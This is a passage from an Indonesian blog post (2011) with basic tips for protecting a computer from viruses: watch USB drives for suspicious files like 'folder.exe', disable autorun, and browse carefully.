        Anda mungkin pernah melihat tiba-tiba saja flasdisk anda penuh dengan file-file baru dimana anda sama sekali tidak pernah merasa memasukkan file-file tersebut kedalam file anda. Kalau begitu “Selamat!!!”  flasdisk anda telah terinfeksi virus hehe… File-file dengan kemasan yang terlihat wajar namun bila anda cukup jeli sebenarnya file tersebut sangatlah tidak wajar. Misalnya terdapat file folder yang berekstensi sebagai program aplikasi (folder.exe). Pada dasarnya file-file virus tersebut tidak akan langsung aktif selama anda tidak mengakses (klik) file tersebut meskipun ada beberapa yang memanfaatkan fasilitas autorun dalam sistem. Oleh karena itu ada baiknya kita menonaktifkan fasilitas autorun dalam sistem seperti yang sudah kita bahas di atas. Sekali lagi si pembuat virus akan memanfaatkan kecerobohan dari user untuk mengklik dan mengaktifkan virus. So, waspadalah !!!


        7.    Browsinglah dengan sehat dan aman.
        Ini mungkin menjadi langkah yang paling ampuh untuk mencegah  dari serangan virus kekomputer anda. Browsinglah dengan sehat dan aman. Ibarat berbelanja sebaiknya anda tahu dengan cermat barang apa saja yan akan anda beli jangan sembrono dan serakah main comot saja. Begitu juga ketika anda browsing lakukan hal serupa dan jangan berlebihan meskipun jiwa petualang anda sangat menggebu-nggebu. Karena bisa-bisa anda malah masuk ke alamat-alamat yang berpotensi besar menyebarkan malware dan kroni-kroninya yang malah merugikan sistem komputer anda.


        Seperti itulah beberapa tips yang bisa anda coba untuk mencegah potensi komputer  anda dari serangan virus. Namun kalau emang terjangkitnya sudah parah, seperti kata slogan yang umum “Jika sakit berlanjut hubungi dokter” jadi serahkanlah pada ahlinya untuk membantu anda. Semoga bermanfaat.

          
        Posted on 12:25 PM / 1 comments / Read More
         
        Copyright © 2011. Kedai Info . All Rights Reserved
        Home | Company Info | Contact Us | Privacy policy | Term of use | Widget | Site map